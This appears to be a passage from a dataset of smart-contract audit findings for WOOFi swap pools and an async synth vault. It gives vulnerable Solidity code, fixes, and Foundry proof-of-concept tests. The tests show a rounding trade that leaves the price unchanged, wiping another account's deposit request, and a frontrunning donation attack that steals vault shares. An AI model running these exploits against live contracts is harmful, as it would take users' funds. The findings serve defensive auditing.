enough on most of the cases. I'd suggest return the oracle price in ""18"" decimals to get more room on rounding.",Oracle will fail to do a validation of its price with the chainlink price.,"```\\nfunction _cloPriceInQuote(address _fromToken, address _toToken)\\n internal\\n view\\n returns (uint256 refPrice, uint256 refTimestamp)\\n {\\n address baseOracle = clOracles[_fromToken].oracle;\\n if (baseOracle == address(0)) {\\n return (0, 0);\\n }\\n address quoteOracle = clOracles[_toToken].oracle;\\n uint8 quoteDecimal = clOracles[_toToken].decimal;\\n\\n (, int256 rawBaseRefPrice, , uint256 baseUpdatedAt, ) = AggregatorV3Interface(baseOracle).latestRoundData();\\n (, int256 rawQuoteRefPrice, , uint256 quoteUpdatedAt, ) = AggregatorV3Interface(quoteOracle).latestRoundData();\\n uint256 baseRefPrice = uint256(rawBaseRefPrice);\\n uint256 quoteRefPrice = uint256(rawQuoteRefPrice);\\n\\n // NOTE: Assume wooracle token decimal is same as chainlink token decimal.\\n uint256 ceoff = uint256(10)**quoteDecimal;\\n refPrice = (baseRefPrice * ceoff) / quoteRefPrice;\\n refTimestamp = baseUpdatedAt >= quoteUpdatedAt ? quoteUpdatedAt : baseUpdatedAt;\\n }\\n```\\n" +Swaps can happen without changing the price for the next trade due to gamma = 0,medium,"When a swap happens in WoofiPool the price is updated accordingly respect to such value ""gamma"". However, there are some cases where the swap results to a ""gamma"" value of ""0"" which will not change the new price for the next trade.\\nThis is how the quote token received and new price is calculated when given amount of base tokens are sold to the pool:\\n```\\nfunction _calcQuoteAmountSellBase(\\n address baseToken,\\n uint256 baseAmount,\\n IWooracleV2.State memory state\\n ) private view returns (uint256 quoteAmount, uint256 newPrice) {\\n require(state.woFeasible, ""WooPPV2: !ORACLE_FEASIBLE"");\\n\\n DecimalInfo memory decs = decimalInfo(baseToken);\\n\\n // gamma = k * price * base_amount; and decimal 18\\n uint256 gamma;\\n {\\n uint256 notionalSwap = (baseAmount * state.price * decs.quoteDec) / decs.baseDec / decs.priceDec;\\n require(notionalSwap <= tokenInfos[baseToken].maxNotionalSwap, ""WooPPV2: !maxNotionalValue"");\\n\\n gamma = (baseAmount * state.price * state.coeff) / decs.priceDec / decs.baseDec;\\n require(gamma <= tokenInfos[baseToken].maxGamma, ""WooPPV2: !gamma"");\\n\\n // Formula: quoteAmount = baseAmount * oracle.price * (1 - oracle.k * baseAmount * oracle.price - oracle.spread)\\n quoteAmount =\\n (((baseAmount * state.price * decs.quoteDec) / decs.priceDec) *\\n (uint256(1e18) - gamma - state.spread)) /\\n 1e18 /\\n decs.baseDec;\\n }\\n\\n // newPrice = oracle.price * (1 - k * oracle.price * baseAmount)\\n newPrice = ((uint256(1e18) - gamma) * state.price) / 1e18;\\n }\\n```\\n\\nNow, let's assume: DAI is quoteToken, 18 decimals tokenX is baseToken which has a price of 0.01 DAI, 18 decimals coefficient = 0.000000001 * 1e18 spread = 0.001 * 1e18 baseAmount (amount of tokenX are sold) = 1e10;\\nfirst calculate the gamma: (baseAmount * state.price * state.coeff) / decs.priceDec / decs.baseDec; = 1e10 * 0.01 * 1e8 * 0.000000001 * 1e18 / 1e8 / 1e18 = 0 due to round down\\nlet's calculate the `quoteAmount` will be received: `quoteAmount` = (((baseAmount * state.price * decs.quoteDec) / decs.priceDec) * (uint256(1e18) - gamma - state.spread)) / 1e18 / decs.baseDec; (1e10 * 0.01 * 1e8 * 1e18 / 1e8) * (1e18 - 0 - 0.01 * 1e18) / 1e18 / 1e18 = 99900000 which is not ""0"".\\nlet's calculate the new price: newPrice = ((uint256(1e18) - gamma) * state.price) / 1e18; = (1e18 - 0) * 0.01 * 1e8 / 1e18 = 0.01 * 1e8 which is the same price, no price changes!\\nThat would also means if the ""gamma"" is ""0"", then this is the best possible swap outcome. If a user does this in a for loop multiple times in a cheap network, user can trade significant amount of tokens without changing the price.\\nCoded PoC (values are the same as in the above textual scenario):\\n```\\nfunction test_SwapsHappenPriceIsNotUpdatedDueToRoundDown() public {\\n // USDC --> DAI address, mind the naming..\\n uint usdcAmount = 1_000_000 * 1e18;\\n uint wooAmount = 100_000 * 1e18;\\n uint wethAmount = 1_000 * 1e18;\\n deal(USDC, ADMIN, usdcAmount);\\n deal(WOO, ADMIN, wooAmount);\\n deal(WETH, ADMIN, wethAmount);\\n\\n vm.startPrank(ADMIN);\\n IERC20(USDC).approve(address(pool), type(uint256).max);\\n IERC20(WOO).approve(address(pool), type(uint256).max);\\n IERC20(WETH).approve(address(pool), type(uint256).max);\\n pool.depositAll(USDC);\\n pool.depositAll(WOO);\\n pool.depositAll(WETH);\\n vm.stopPrank();\\n\\n uint wooAmountForTapir = 1e10 * 1000;\\n vm.startPrank(TAPIR);\\n deal(WOO, TAPIR, wooAmountForTapir);\\n IERC20(USDC).approve(address(router), type(uint256).max);\\n IERC20(WOO).approve(address(router), type(uint256).max);\\n IERC20(WETH).approve(address(router), type(uint256).max);\\n vm.stopPrank();\\n\\n // WHERE THE MAGIC HAPPENS\\n (uint128 price, ) = oracle.woPrice(WOO);\\n console.log(""price"", price);\\n \\n uint cumulative;\\n for (uint i = 0; i < 1000; ++i) {\\n vm.prank(TAPIR);\\n cumulative += router.swap(WOO, USDC, wooAmountForTapir / 1000, 0, payable(TAPIR), TAPIR);\\n }\\n\\n (uint128 newPrice, ) = oracle.woPrice(WOO);\\n console.log(""price"", price);\\n\\n // price hasnt changed although there are significant amount of tokens are being traded by TAPIR\\n assertEq(newPrice, price);\\n }\\n```\\n","if the ""gamma"" is ""0"", then revert.","As by design, the price should change after every trade irrelevant of the amount that is being traded. Also, in a cheap network the attack can be quite realistic. Hence, I'll label this as medium.","```\\nfunction _calcQuoteAmountSellBase(\\n address baseToken,\\n uint256 baseAmount,\\n IWooracleV2.State memory state\\n ) private view returns (uint256 quoteAmount, uint256 newPrice) {\\n require(state.woFeasible, ""WooPPV2: !ORACLE_FEASIBLE"");\\n\\n DecimalInfo memory decs = decimalInfo(baseToken);\\n\\n // gamma = k * price * base_amount; and decimal 18\\n uint256 gamma;\\n {\\n uint256 notionalSwap = (baseAmount * state.price * decs.quoteDec) / decs.baseDec / decs.priceDec;\\n require(notionalSwap <= tokenInfos[baseToken].maxNotionalSwap, ""WooPPV2: !maxNotionalValue"");\\n\\n gamma = (baseAmount * state.price * state.coeff) / decs.priceDec / decs.baseDec;\\n require(gamma <= tokenInfos[baseToken].maxGamma, ""WooPPV2: !gamma"");\\n\\n // Formula: quoteAmount = baseAmount * oracle.price * (1 - oracle.k * baseAmount * oracle.price - oracle.spread)\\n quoteAmount =\\n (((baseAmount * state.price * decs.quoteDec) / decs.priceDec) *\\n (uint256(1e18) - gamma - state.spread)) /\\n 1e18 /\\n decs.baseDec;\\n }\\n\\n // newPrice = oracle.price * (1 - k * oracle.price * baseAmount)\\n newPrice = ((uint256(1e18) - gamma) * state.price) / 1e18;\\n }\\n```\\n" +"In the function _handleERC20Received, the fee was incorrectly charged",medium,"In the function _handleERC20Received, the fee was incorrectly charged.\\nIn the contract, when external swap occurs, a portion of the fee will be charged. However, in function _handleERC20Received, the fee is also charged in internal swap.\\n```\\n} else {\\n // Deduct the external swap fee\\n uint256 fee = (bridgedAmount * dstExternalFeeRate) / FEE_BASE;\\n bridgedAmount -= fee; // @@audit: fee should not be applied to internal swap \\n\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n if (dst1inch.swapRouter != address(0)) {\\n try\\n wooRouter.externalSwap(\\n```\\n\\nAt the same time, when the internal swap fails, this part of the fee will not be returned to the user.","Apply fee calculation only to external swaps.\\n```\\nfunction _handleERC20Received(\\n uint256 refId,\\n address to,\\n address toToken,\\n address bridgedToken,\\n uint256 bridgedAmount,\\n uint256 minToAmount,\\n Dst1inch memory dst1inch\\n) internal {\\n address msgSender = _msgSender();\\n\\n // // rest of code\\n\\n } else {\\n if (dst1inch.swapRouter != address(0)) {\\n // Deduct the external swap fee\\n uint256 fee = (bridgedAmount * dstExternalFeeRate) / FEE_BASE;\\n bridgedAmount -= fee; \\n\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n try\\n wooRouter.externalSwap(\\n // // rest of code\\n )\\n returns (uint256 realToAmount) {\\n emit WooCrossSwapOnDstChain(\\n // // rest of code\\n );\\n } catch {\\n bridgedAmount += fee;\\n TransferHelper.safeTransfer(bridgedToken, to, bridgedAmount);\\n emit WooCrossSwapOnDstChain(\\n // // rest of code\\n );\\n }\\n } else {\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n try wooRouter.swap(bridgedToken, toToken, bridgedAmount, minToAmount, payable(to), to) returns (\\n uint256 realToAmount\\n ) {\\n // // rest of code\\n } catch {\\n // // rest of code\\n }\\n }\\n }\\n}\\n```\\n","Internal swaps are incorrectly charged, and fees are not refunded when internal swap fail.","```\\n} else {\\n // Deduct the external swap fee\\n uint256 fee = (bridgedAmount * dstExternalFeeRate) / FEE_BASE;\\n bridgedAmount -= fee; // @@audit: fee should not be applied to internal swap \\n\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n if (dst1inch.swapRouter != address(0)) {\\n try\\n wooRouter.externalSwap(\\n```\\n" +Claim functions don't validate if the epoch is settled,high,"Both claim functions fail to validate if the epoch for the request has been already settled, leading to loss of funds when claiming requests for the current epoch. The issue is worsened as `claimAndRequestDeposit()` can be used to claim a deposit on behalf of any account, allowing an attacker to wipe other's requests.\\nWhen the vault is closed, users can request a deposit, transfer assets and later claim shares, or request a redemption, transfer shares and later redeem assets. Both of these processes store the assets or shares, and later convert these when the epoch is settled. For deposits, the core of the implementation is given by _claimDeposit():\\n```\\nfunction _claimDeposit(\\n address owner,\\n address receiver\\n)\\n internal\\n returns (uint256 shares)\\n{\\n shares = previewClaimDeposit(owner);\\n\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n epochs[lastRequestId].depositRequestBalance[owner] = 0;\\n _update(address(claimableSilo), receiver, shares);\\n emit ClaimDeposit(lastRequestId, owner, receiver, assets, shares);\\n}\\n\\nfunction previewClaimDeposit(address owner) public view returns (uint256) {\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n return _convertToShares(assets, lastRequestId, Math.Rounding.Floor);\\n}\\n\\nfunction _convertToShares(\\n uint256 assets,\\n uint256 requestId,\\n Math.Rounding rounding\\n)\\n internal\\n view\\n returns (uint256)\\n{\\n if (isCurrentEpoch(requestId)) {\\n return 0;\\n }\\n uint256 totalAssets =\\n epochs[requestId].totalAssetsSnapshotForDeposit + 1;\\n uint256 totalSupply =\\n epochs[requestId].totalSupplySnapshotForDeposit + 1;\\n\\n return assets.mulDiv(totalSupply, totalAssets, rounding);\\n}\\n```\\n\\nAnd for redemptions in _claimRedeem():\\n```\\nfunction _claimRedeem(\\n address owner,\\n address receiver\\n)\\n internal\\n whenNotPaused\\n returns (uint256 assets)\\n{\\n assets = previewClaimRedeem(owner);\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n uint256 shares = epochs[lastRequestId].redeemRequestBalance[owner];\\n epochs[lastRequestId].redeemRequestBalance[owner] = 0;\\n _asset.safeTransferFrom(address(claimableSilo), address(this), assets);\\n _asset.transfer(receiver, assets);\\n emit ClaimRedeem(lastRequestId, owner, receiver, assets, shares);\\n}\\n\\nfunction previewClaimRedeem(address owner) public view returns (uint256) {\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n uint256 shares = epochs[lastRequestId].redeemRequestBalance[owner];\\n return _convertToAssets(shares, lastRequestId, Math.Rounding.Floor);\\n}\\n\\nfunction _convertToAssets(\\n uint256 shares,\\n uint256 requestId,\\n Math.Rounding rounding\\n)\\n internal\\n view\\n returns (uint256)\\n{\\n if (isCurrentEpoch(requestId)) {\\n return 0;\\n }\\n uint256 totalAssets = epochs[requestId].totalAssetsSnapshotForRedeem + 1;\\n uint256 totalSupply = epochs[requestId].totalSupplySnapshotForRedeem + 1;\\n\\n return shares.mulDiv(totalAssets, totalSupply, rounding);\\n}\\n```\\n\\nNote that in both cases the ""preview"" functions are used to convert and calculate the amounts owed to the user: `_convertToShares()` and `_convertToAssets()` use the settled values stored in `epochs[requestId]` to convert between assets and shares.\\nHowever, there is no validation to check if the claiming is done for the current unsettled epoch. If a user claims a deposit or redemption during the same epoch it has been requested, the values stored in `epochs[epochId]` will be uninitialized, which means that `_convertToShares()` and `_convertToAssets()` will use zero values leading to zero results too. The claiming process will succeed, but since the converted amounts are zero, the users will always get zero assets or shares.\\nThis is even worsened by the fact that `claimAndRequestDeposit()` can be used to claim a deposit on behalf of any `account`. An attacker can wipe any requested deposit from an arbitrary `account` by simply calling `claimAndRequestDeposit(0, `account`, """")`. This will internally execute `_claimDeposit(account, account)`, which will trigger the described issue.\\nThe following proof of concept demonstrates the scenario in which a user claims their own deposit during the current epoch:\\n```\\nfunction test_ClaimSameEpochLossOfFunds_Scenario_A() public {\\n asset.mint(alice, 1_000e18);\\n\\n vm.prank(alice);\\n vault.deposit(500e18, alice);\\n\\n // vault is closed\\n vm.prank(owner);\\n vault.close();\\n\\n // alice requests a deposit\\n vm.prank(alice);\\n vault.requestDeposit(500e18, alice, alice, """");\\n\\n // the request is successfully created\\n assertEq(vault.pendingDepositRequest(alice), 500e18);\\n\\n // now alice claims the deposit while vault is still open\\n vm.prank(alice);\\n vault.claimDeposit(alice);\\n\\n // request is gone\\n assertEq(vault.pendingDepositRequest(alice), 0);\\n}\\n```\\n\\nThis other proof of concept illustrates the scenario in which an attacker calls `claimAndRequestDeposit()` to wipe the deposit of another account.\\n```\\nfunction test_ClaimSameEpochLossOfFunds_Scenario_B() public {\\n asset.mint(alice, 1_000e18);\\n\\n vm.prank(alice);\\n vault.deposit(500e18, alice);\\n\\n // vault is closed\\n vm.prank(owner);\\n vault.close();\\n\\n // alice requests a deposit\\n vm.prank(alice);\\n vault.requestDeposit(500e18, alice, alice, """");\\n\\n // the request is successfully created\\n assertEq(vault.pendingDepositRequest(alice), 500e18);\\n\\n // bob can issue a claim for alice through claimAndRequestDeposit()\\n vm.prank(bob);\\n vault.claimAndRequestDeposit(0, alice, """");\\n\\n // request is gone\\n assertEq(vault.pendingDepositRequest(alice), 0);\\n}\\n```\\n","Check that the epoch associated with the request is not the current epoch.\\n```\\n function _claimDeposit(\\n address owner,\\n address receiver\\n )\\n internal\\n returns (uint256 shares)\\n {\\n// Add the line below\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n// Add the line below\\n if (isCurrentEpoch(lastRequestId)) revert();\\n \\n shares = previewClaimDeposit(owner);\\n\\n// Remove the line below\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n epochs[lastRequestId].depositRequestBalance[owner] = 0;\\n _update(address(claimableSilo), receiver, shares);\\n emit ClaimDeposit(lastRequestId, owner, receiver, assets, shares);\\n }\\n```\\n\\n```\\n function _claimRedeem(\\n address owner,\\n address receiver\\n )\\n internal\\n whenNotPaused\\n returns (uint256 assets)\\n {\\n// Add the line below\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n// Add the line below\\n if (isCurrentEpoch(lastRequestId)) revert();\\n \\n assets = previewClaimRedeem(owner);\\n// Remove the line below\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n uint256 shares = epochs[lastRequestId].redeemRequestBalance[owner];\\n epochs[lastRequestId].redeemRequestBalance[owner] = 0;\\n _asset.safeTransferFrom(address(claimableSilo), address(this), assets);\\n _asset.transfer(receiver, assets);\\n emit ClaimRedeem(lastRequestId, owner, receiver, assets, shares);\\n }\\n```\\n","CRITICAL. Requests can be wiped by executing the claim in an unsettled epoch, leading to loss of funds. The issue can also be triggered for any arbitrary account by using `claimAndRequestDeposit()`.","```\\nfunction _claimDeposit(\\n address owner,\\n address receiver\\n)\\n internal\\n returns (uint256 shares)\\n{\\n shares = previewClaimDeposit(owner);\\n\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n epochs[lastRequestId].depositRequestBalance[owner] = 0;\\n _update(address(claimableSilo), receiver, shares);\\n emit ClaimDeposit(lastRequestId, owner, receiver, assets, shares);\\n}\\n\\nfunction previewClaimDeposit(address owner) public view returns (uint256) {\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n return _convertToShares(assets, lastRequestId, Math.Rounding.Floor);\\n}\\n\\nfunction _convertToShares(\\n uint256 assets,\\n uint256 requestId,\\n Math.Rounding rounding\\n)\\n internal\\n view\\n returns (uint256)\\n{\\n if (isCurrentEpoch(requestId)) {\\n return 0;\\n }\\n uint256 totalAssets =\\n epochs[requestId].totalAssetsSnapshotForDeposit + 1;\\n uint256 totalSupply =\\n epochs[requestId].totalSupplySnapshotForDeposit + 1;\\n\\n return assets.mulDiv(totalSupply, totalAssets, rounding);\\n}\\n```\\n" +Calling `requestRedeem` with `_msgSender() != owner` will lead to user's shares being locked in the vault forever,high,"The `requestRedeem` function in `AsyncSynthVault.sol` can be invoked by a user on behalf of another user, referred to as 'owner', provided that the user has been granted sufficient allowance by the 'owner'. However, this action results in a complete loss of balance.\\nThe `_createRedeemRequest` function contains a discrepancy; it fails to update the `lastRedeemRequestId` for the user eligible to claim the shares upon maturity. Instead, it updates this identifier for the 'owner' who delegated their shares to the user. As a result, the shares become permanently locked in the vault, rendering them unclaimable by either the 'owner' or the user.\\nThis issue unfolds as follows:\\nThe 'owner' deposits tokens into the vault, receiving vault `shares` in return.\\nThe 'owner' then delegates the allowance of all their vault `shares` to another user.\\nWhen `epochId == 1`, this user executes The `requestRedeem` , specifying the 'owner''s address as `owner`, the user's address as `receiver`, and the 'owner''s share balance as `shares`.\\nThe internal function `_createRedeemRequest` is invoked, incrementing `epochs[epochId].redeemRequestBalance[receiver]` by the amount of `shares`, and setting `lastRedeemRequestId[owner] = epochId`.\\nAt `epochId == 2`, the user calls `claimRedeem`, which in turn calls the internal function `_claimRedeem`, with `owner` set to `_msgSender()` (i.e., the user's address) and `receiver` also set to the user's address.\\nIn this scenario, `lastRequestId` remains zero because `lastRedeemRequestId[owner] == 0` (here, `owner` refers to the user's address). Consequently, `epochs[lastRequestId].redeemRequestBalance[owner]` is also zero. Therefore, no `shares` are minted to the user.\\nProof of Code :\\nThe following test demonstrates the claim made above :\\n```\\nfunction test_poc() external {\\n // set token balances\\n deal(vaultTested.asset(), user1.addr, 20); // owner\\n\\n vm.startPrank(user1.addr);\\n IERC20Metadata(vaultTested.asset()).approve(address(vaultTested), 20);\\n // owner deposits tokens when vault is open and receives vault shares\\n vaultTested.deposit(20, user1.addr);\\n // owner delegates shares balance to user\\n IERC20Metadata(address(vaultTested)).approve(\\n user2.addr,\\n vaultTested.balanceOf(user1.addr)\\n );\\n vm.stopPrank();\\n\\n // vault is closed\\n vm.prank(vaultTested.owner());\\n vaultTested.close();\\n\\n // epoch = 1\\n vm.startPrank(user2.addr);\\n // user requests a redeem on behlaf of owner\\n vaultTested.requestRedeem(\\n vaultTested.balanceOf(user1.addr),\\n user2.addr,\\n user1.addr,\\n """"\\n );\\n // user checks the pending redeem request amount\\n assertEq(vaultTested.pendingRedeemRequest(user2.addr), 20);\\n vm.stopPrank();\\n\\n vm.startPrank(vaultTested.owner());\\n IERC20Metadata(vaultTested.asset()).approve(\\n address(vaultTested),\\n type(uint256).max\\n );\\n vaultTested.settle(23); // an epoch goes by\\n vm.stopPrank();\\n\\n // epoch = 2\\n\\n vm.startPrank(user2.addr);\\n // user tries to claim the redeem\\n vaultTested.claimRedeem(user2.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n // however, token balance of user is still empty\\n vm.stopPrank();\\n\\n vm.startPrank(user1.addr);\\n // owner also tries to claim the redeem\\n vaultTested.claimRedeem(user1.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n // however, token balance of owner is still empty\\n vm.stopPrank();\\n\\n // all the balances of owner and user are zero, indicating loss of funds\\n assertEq(vaultTested.balanceOf(user1.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n assertEq(vaultTested.balanceOf(user2.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n }\\n```\\n\\nTo run the test :\\nCopy the above code and paste it into `TestClaimDeposit.t.sol`\\nRun `forge test --match-test test_poc --ffi`",Modify `_createRedeemRequest` as follows :\\n```\\n// Remove the line below\\n lastRedeemRequestId[owner] = epochId;\\n// Add the line below\\n lastRedeemRequestid[receiver] = epochId;\\n```\\n,The shares are locked in the vault forever with no method for recovery by the user or the 'owner'.,"```\\nfunction test_poc() external {\\n // set token balances\\n deal(vaultTested.asset(), user1.addr, 20); // owner\\n\\n vm.startPrank(user1.addr);\\n IERC20Metadata(vaultTested.asset()).approve(address(vaultTested), 20);\\n // owner deposits tokens when vault is open and receives vault shares\\n vaultTested.deposit(20, user1.addr);\\n // owner delegates shares balance to user\\n IERC20Metadata(address(vaultTested)).approve(\\n user2.addr,\\n vaultTested.balanceOf(user1.addr)\\n );\\n vm.stopPrank();\\n\\n // vault is closed\\n vm.prank(vaultTested.owner());\\n vaultTested.close();\\n\\n // epoch = 1\\n vm.startPrank(user2.addr);\\n // user requests a redeem on behlaf of owner\\n vaultTested.requestRedeem(\\n vaultTested.balanceOf(user1.addr),\\n user2.addr,\\n user1.addr,\\n """"\\n );\\n // user checks the pending redeem request amount\\n assertEq(vaultTested.pendingRedeemRequest(user2.addr), 20);\\n vm.stopPrank();\\n\\n vm.startPrank(vaultTested.owner());\\n IERC20Metadata(vaultTested.asset()).approve(\\n address(vaultTested),\\n type(uint256).max\\n );\\n vaultTested.settle(23); // an epoch goes by\\n vm.stopPrank();\\n\\n // epoch = 2\\n\\n vm.startPrank(user2.addr);\\n // user tries to claim the redeem\\n vaultTested.claimRedeem(user2.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n // however, token balance of user is still empty\\n vm.stopPrank();\\n\\n vm.startPrank(user1.addr);\\n // owner also tries to claim the redeem\\n vaultTested.claimRedeem(user1.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n // however, token balance of owner is still empty\\n vm.stopPrank();\\n\\n // all the balances of owner and user are zero, indicating loss of funds\\n assertEq(vaultTested.balanceOf(user1.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n assertEq(vaultTested.balanceOf(user2.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n }\\n```\\n" +"Exchange rate is calculated incorrectly when the vault is closed, potentially leading to funds being stolen",high,"The exchange ratio between shares and assets is calculated incorrectly when the vault is closed. This can cause accounting inconsistencies, funds being stolen and users being unable to redeem shares.\\nThe functions AsyncSynthVault::_convertToAssets and AsyncSynthVault::_convertToShares both add `1` to the epoch cached variables `totalAssetsSnapshotForDeposit`, `totalSupplySnapshotForDeposit`, `totalAssetsSnapshotForRedeem` and `totalSupplySnapshotForRedeem`.\\nThis is incorrect because the function previewSettle, used in _settle(), already adds `1` to the variables:\\n```\\n// rest of code\\nuint256 totalAssetsSnapshotForDeposit = _lastSavedBalance + 1;\\nuint256 totalSupplySnapshotForDeposit = totalSupply + 1;\\n// rest of code\\nuint256 totalAssetsSnapshotForRedeem = _lastSavedBalance + pendingDeposit + 1;\\nuint256 totalSupplySnapshotForRedeem = totalSupply + sharesToMint + 1;\\n// rest of code\\n```\\n\\nThis leads to accounting inconsistencies between depositing/redeeming when a vault is closed and depositing/redeeming when a vault is open whenever the exchange ratio assets/shares is not exactly 1:1.\\nIf a share is worth more than one asset:\\nUsers that will request a deposit while the vault is closed will receive more shares than they should\\nUsers that will request a redeem while the vault is closed will receive less assets than they should\\nPOC\\nThis can be taken advantage of by an attacker by doing the following:\\nThe attacker monitors the mempool for a vault deployment.\\nBefore the vault is deployed the attacker transfers to the vault some of the vault underlying asset (donation). This increases the value of one share.\\nThe protocol team initializes the vault and adds the bootstrap liquidity.\\nUsers use the protocol normally and deposits some assets.\\nThe vault gets closed by the protocol team and the funds invested.\\nSome users request a deposit while the vault is closed.\\nThe attacker monitors the mempool to know when the vault will be open again.\\nRight before the vault is opened, the attacker performs multiple deposit requests with different accounts. For each account he deposits the minimum amount of assets required to receive 1 share.\\nThe vault opens.\\nThe attacker claims all of the deposits with every account and then redeems the shares immediately for profit.\\nThis will ""steal"" shares of other users (point 6) from the claimable silo because the protocol will give the attacker more shares than it should. The attacker will profit and some users won't be able to claim their shares.\\nAdd imports to TestClaimRedeem.t.sol:\\n```\\nimport { IERC20 } from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\n```\\n\\nand copy-paste:\\n```\\nfunction test_attackerProfitsViaRequestingDeposits() external {\\n address attacker = makeAddr(""attacker"");\\n address protocolUsers = makeAddr(""alice"");\\n address vaultOwner = vaultTested.owner();\\n\\n uint256 donation = 1e18 - 1;\\n uint256 protocolUsersDeposit = 10e18 + 15e18;\\n uint256 protocolTeamBootstrapDeposit = 1e18;\\n\\n IERC20 asset = IERC20(vaultTested.asset());\\n deal(address(asset), protocolUsers, protocolUsersDeposit);\\n deal(address(asset), attacker, donation);\\n deal(address(asset), vaultOwner, protocolTeamBootstrapDeposit);\\n\\n vm.prank(vaultOwner);\\n asset.approve(address(vaultTested), type(uint256).max);\\n\\n vm.prank(protocolUsers);\\n asset.approve(address(vaultTested), type(uint256).max);\\n\\n vm.prank(attacker);\\n asset.approve(address(vaultTested), type(uint256).max);\\n\\n //-> Attacker donates `1e18 - 1` assets, this can be done before the vault is even deployed\\n vm.prank(attacker);\\n asset.transfer(address(vaultTested), donation);\\n\\n //-> Protocol team bootstraps the vault with `1e18` of assets\\n vm.prank(vaultOwner);\\n vaultTested.deposit(protocolTeamBootstrapDeposit, vaultOwner);\\n \\n //-> Users deposit `10e18` of liquidity in the vault\\n vm.prank(protocolUsers);\\n vaultTested.deposit(10e18, protocolUsers);\\n\\n //-> Vault gets closed\\n vm.prank(vaultOwner);\\n vaultTested.close();\\n\\n //-> Users request deposits for `15e18` assets\\n vm.prank(protocolUsers);\\n vaultTested.requestDeposit(15e18, protocolUsers, protocolUsers, """");\\n\\n //-> The attacker frontruns the call to `open()` and knows that:\\n //- The current epoch cached `totalSupply` of shares will be `vaultTested.totalSupply()` + 1 + 1\\n //- The current epoch cached `totalAssets` will be 12e18 + 1 + 1\\n uint256 totalSupplyCachedOnOpen = vaultTested.totalSupply() + 1 + 1; //Current supply of shares, plus 1 used as virtual share, plus 1 added by `_convertToAssets`\\n uint256 totalAssetsCachedOnOpen = vaultTested.lastSavedBalance() + 1 + 1; //Total assets passed as paremeter to `open`, plus 1 used as virtual share, plus 1 added by `_convertToAssets`\\n uint256 minToDepositToGetOneShare = totalAssetsCachedOnOpen / totalSupplyCachedOnOpen;\\n\\n //-> Attacker frontruns the call to `open()` by requesting a deposit with multiple fresh accounts\\n uint256 totalDeposited = 0;\\n for(uint256 i = 0; i < 30; i++) {\\n address attackerEOA = address(uint160(i * 31000 + 49*49)); //Random address that does not conflict with existing ones\\n deal(address(asset), attackerEOA, minToDepositToGetOneShare);\\n vm.startPrank(attackerEOA);\\n asset.approve(address(vaultTested), type(uint256).max);\\n vaultTested.requestDeposit(minToDepositToGetOneShare, attackerEOA, attackerEOA, """");\\n vm.stopPrank();\\n totalDeposited += minToDepositToGetOneShare;\\n }\\n\\n //->Vault gets opened again with 0 profit and 0 losses (for simplicity)\\n vm.startPrank(vaultOwner);\\n vaultTested.open(vaultTested.lastSavedBalance());\\n vm.stopPrank();\\n\\n //-> Attacker claims his deposits and withdraws them immediately for profit\\n uint256 totalRedeemed = 0;\\n for(uint256 i = 0; i < 30; i++) {\\n address attackerEOA = address(uint160(i * 31000 + 49*49)); //Random address that does not conflict with existing ones\\n vm.startPrank(attackerEOA);\\n vaultTested.claimDeposit(attackerEOA);\\n uint256 assets = vaultTested.redeem(vaultTested.balanceOf(attackerEOA), attackerEOA, attackerEOA);\\n vm.stopPrank();\\n totalRedeemed += assets;\\n }\\n\\n //->❌ Attacker is in profit\\n assertGt(totalRedeemed, totalDeposited + donation);\\n}\\n```\\n",In the functions AsyncSynthVault::_convertToAssets and AsyncSynthVault::_convertToShares:\\nReturn `0` if `requestId == 0`\\nDon't add `1` to the two cached variables\\nIt's also a good idea to perform the initial bootstrapping deposit in the initialize function (as suggested in another finding) and require that the vault contains `0` assets when the first deposit is performed.,"When the ratio between shares and assets is not 1:1 the protocol calculates the exchange rate between assets and shares inconsitently. This is an issue by itself and can lead to loss of funds and users not being able to claim shares. It can also be taken advantage of by an attacker to steal shares from the claimable silo.\\nNote that the ""donation"" done initially is not akin to an ""inflation"" attack because the attacker is not required to mint any share.",```\\n// rest of code\\nuint256 totalAssetsSnapshotForDeposit = _lastSavedBalance + 1;\\nuint256 totalSupplySnapshotForDeposit = totalSupply + 1;\\n// rest of code\\nuint256 totalAssetsSnapshotForRedeem = _lastSavedBalance + pendingDeposit + 1;\\nuint256 totalSupplySnapshotForRedeem = totalSupply + sharesToMint + 1;\\n// rest of code\\n```\\n +The `_zapIn` function may unexpectedly revert due to the incorrect implementation of `_transferTokenInAndApprove`,medium,"The `_transferTokenInAndApprove` function should approve the `router` on behalf of the VaultZapper contract. However, it checks the allowance from `msgSender` to the `router`, rather than the VaultZapper. This potentially results in the VaultZapper not approving the `router` and causing unexpected reverting.\\nThe allowance check in the `_transferTokenInAndApprove` function should verify that 